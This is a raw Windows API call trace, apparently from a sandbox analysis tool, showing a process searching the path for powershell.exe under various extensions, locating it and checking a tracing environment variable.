	[0122.966] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.psd1", lpFindFileData=0x1c70d3f0 | out: lpFindFileData=0x1c70d3f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.966] SetErrorMode (uMode=0x1) returned 0x1
	[0122.966] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c70d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0122.966] SetErrorMode (uMode=0x1) returned 0x1
	[0122.967] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.COM", lpFindFileData=0x1c70d3f0 | out: lpFindFileData=0x1c70d3f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.967] SetErrorMode (uMode=0x1) returned 0x1
	[0122.967] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c70d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0122.967] SetErrorMode (uMode=0x1) returned 0x1
	[0122.967] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.EXE", lpFindFileData=0x1c70d3f0 | out: lpFindFileData=0x1c70d3f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.967] SetErrorMode (uMode=0x1) returned 0x1
	[0122.967] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c70d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0122.968] SetErrorMode (uMode=0x1) returned 0x1
	[0122.968] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.BAT", lpFindFileData=0x1c70d3f0 | out: lpFindFileData=0x1c70d3f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.968] SetErrorMode (uMode=0x1) returned 0x1
	[0122.968] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c70d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0122.968] SetErrorMode (uMode=0x1) returned 0x1
	[0122.968] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.CMD", lpFindFileData=0x1c70d3f0 | out: lpFindFileData=0x1c70d3f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.968] SetErrorMode (uMode=0x1) returned 0x1
	[0122.968] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c70d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0122.969] SetErrorMode (uMode=0x1) returned 0x1
	[0122.969] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.VBS", lpFindFileData=0x1c70d3f0 | out: lpFindFileData=0x1c70d3f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.969] SetErrorMode (uMode=0x1) returned 0x1
	[0122.969] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c70d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0122.969] SetErrorMode (uMode=0x1) returned 0x1
	[0122.969] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.VBE", lpFindFileData=0x1c70d3f0 | out: lpFindFileData=0x1c70d3f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.969] SetErrorMode (uMode=0x1) returned 0x1
	[0122.970] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c70d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0122.970] SetErrorMode (uMode=0x1) returned 0x1
	[0122.970] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.JS", lpFindFileData=0x1c70d3f0 | out: lpFindFileData=0x1c70d3f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.970] SetErrorMode (uMode=0x1) returned 0x1
	[0122.970] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c70d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0122.970] SetErrorMode (uMode=0x1) returned 0x1
	[0122.970] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.JSE", lpFindFileData=0x1c70d3f0 | out: lpFindFileData=0x1c70d3f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.971] SetErrorMode (uMode=0x1) returned 0x1
	[0122.971] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c70d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0122.971] SetErrorMode (uMode=0x1) returned 0x1
	[0122.971] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.WSF", lpFindFileData=0x1c70d3f0 | out: lpFindFileData=0x1c70d3f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.971] SetErrorMode (uMode=0x1) returned 0x1
	[0122.971] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c70d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0122.971] SetErrorMode (uMode=0x1) returned 0x1
	[0122.971] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.WSH", lpFindFileData=0x1c70d3f0 | out: lpFindFileData=0x1c70d3f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.972] SetErrorMode (uMode=0x1) returned 0x1
	[0122.972] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c70d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0122.972] SetErrorMode (uMode=0x1) returned 0x1
	[0122.972] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.MSC", lpFindFileData=0x1c70d3f0 | out: lpFindFileData=0x1c70d3f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.972] SetErrorMode (uMode=0x1) returned 0x1
	[0122.972] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c70d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0122.972] SetErrorMode (uMode=0x1) returned 0x1
	[0122.973] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe", lpFindFileData=0x1c70d3f0 | out: lpFindFileData=0x1c70d3f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.973] SetErrorMode (uMode=0x1) returned 0x1
	[0122.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c70d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0122.973] SetErrorMode (uMode=0x1) returned 0x1
	[0122.973] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.ps1", lpFindFileData=0x1c70d3f0 | out: lpFindFileData=0x1c70d3f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.973] SetErrorMode (uMode=0x1) returned 0x1
	[0122.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c70d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0122.974] SetErrorMode (uMode=0x1) returned 0x1
	[0122.974] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.psm1", lpFindFileData=0x1c70d3f0 | out: lpFindFileData=0x1c70d3f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.974] SetErrorMode (uMode=0x1) returned 0x1
	[0122.974] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c70d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0122.974] SetErrorMode (uMode=0x1) returned 0x1
	[0122.974] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.psd1", lpFindFileData=0x1c70d3f0 | out: lpFindFileData=0x1c70d3f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.974] SetErrorMode (uMode=0x1) returned 0x1
	[0122.975] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c70d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0122.975] SetErrorMode (uMode=0x1) returned 0x1
	[0122.975] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.COM", lpFindFileData=0x1c70d3f0 | out: lpFindFileData=0x1c70d3f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.975] SetErrorMode (uMode=0x1) returned 0x1
	[0122.975] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c70d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0122.975] SetErrorMode (uMode=0x1) returned 0x1
	[0122.976] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.EXE", lpFindFileData=0x1c70d3f0 | out: lpFindFileData=0x1c70d3f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.976] SetErrorMode (uMode=0x1) returned 0x1
	[0122.976] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c70d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0122.976] SetErrorMode (uMode=0x1) returned 0x1
	[0122.976] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.BAT", lpFindFileData=0x1c70d3f0 | out: lpFindFileData=0x1c70d3f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.976] SetErrorMode (uMode=0x1) returned 0x1
	[0122.976] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c70d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0122.977] SetErrorMode (uMode=0x1) returned 0x1
	[0122.977] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.CMD", lpFindFileData=0x1c70d3f0 | out: lpFindFileData=0x1c70d3f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.977] SetErrorMode (uMode=0x1) returned 0x1
	[0122.977] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c70d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0122.977] SetErrorMode (uMode=0x1) returned 0x1
	[0122.977] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.VBS", lpFindFileData=0x1c70d3f0 | out: lpFindFileData=0x1c70d3f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.978] SetErrorMode (uMode=0x1) returned 0x1
	[0122.978] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c70d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0122.978] SetErrorMode (uMode=0x1) returned 0x1
	[0122.978] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.VBE", lpFindFileData=0x1c70d3f0 | out: lpFindFileData=0x1c70d3f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.978] SetErrorMode (uMode=0x1) returned 0x1
	[0122.978] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c70d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0122.978] SetErrorMode (uMode=0x1) returned 0x1
	[0122.978] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.JS", lpFindFileData=0x1c70d3f0 | out: lpFindFileData=0x1c70d3f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.979] SetErrorMode (uMode=0x1) returned 0x1
	[0122.979] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c70d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0122.979] SetErrorMode (uMode=0x1) returned 0x1
	[0122.979] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.JSE", lpFindFileData=0x1c70d3f0 | out: lpFindFileData=0x1c70d3f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.979] SetErrorMode (uMode=0x1) returned 0x1
	[0122.979] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c70d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0122.979] SetErrorMode (uMode=0x1) returned 0x1
	[0122.980] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.WSF", lpFindFileData=0x1c70d3f0 | out: lpFindFileData=0x1c70d3f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.980] SetErrorMode (uMode=0x1) returned 0x1
	[0122.980] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c70d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0122.980] SetErrorMode (uMode=0x1) returned 0x1
	[0122.980] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.WSH", lpFindFileData=0x1c70d3f0 | out: lpFindFileData=0x1c70d3f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.980] SetErrorMode (uMode=0x1) returned 0x1
	[0122.980] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c70d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0122.981] SetErrorMode (uMode=0x1) returned 0x1
	[0122.981] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.MSC", lpFindFileData=0x1c70d3f0 | out: lpFindFileData=0x1c70d3f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.981] SetErrorMode (uMode=0x1) returned 0x1
	[0122.981] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c70d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0122.981] SetErrorMode (uMode=0x1) returned 0x1
	[0122.981] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFindFileData=0x1c70d3f0 | out: lpFindFileData=0x1c70d3f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x1cede160
	[0122.982] FindNextFileW (in: hFindFile=0x1cede160, lpFindFileData=0x1c70d400 | out: lpFindFileData=0x1c70d400*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0122.982] FindClose (in: hFindFile=0x1cede160 | out: hFindFile=0x1cede160) returned 1
	[0122.982] SetErrorMode (uMode=0x1) returned 0x1
	[0122.998] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c70d510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0122.998] SetErrorMode (uMode=0x1) returned 0x1
	[0122.998] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c70d720 | out: lpFileInformation=0x1c70d720*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0122.998] SetErrorMode (uMode=0x1) returned 0x1
	[0122.999] CoTaskMemAlloc (cb=0x104) returned 0x309710
	[0122.999] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x309710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0122.999] CoTaskMemFree (pv=0x309710) 
	[0123.000] CoTaskMemAlloc (cb=0x104) returned 0x309710
	[0123.000] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x309710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0123.000] CoTaskMemFree (pv=0x309710) 
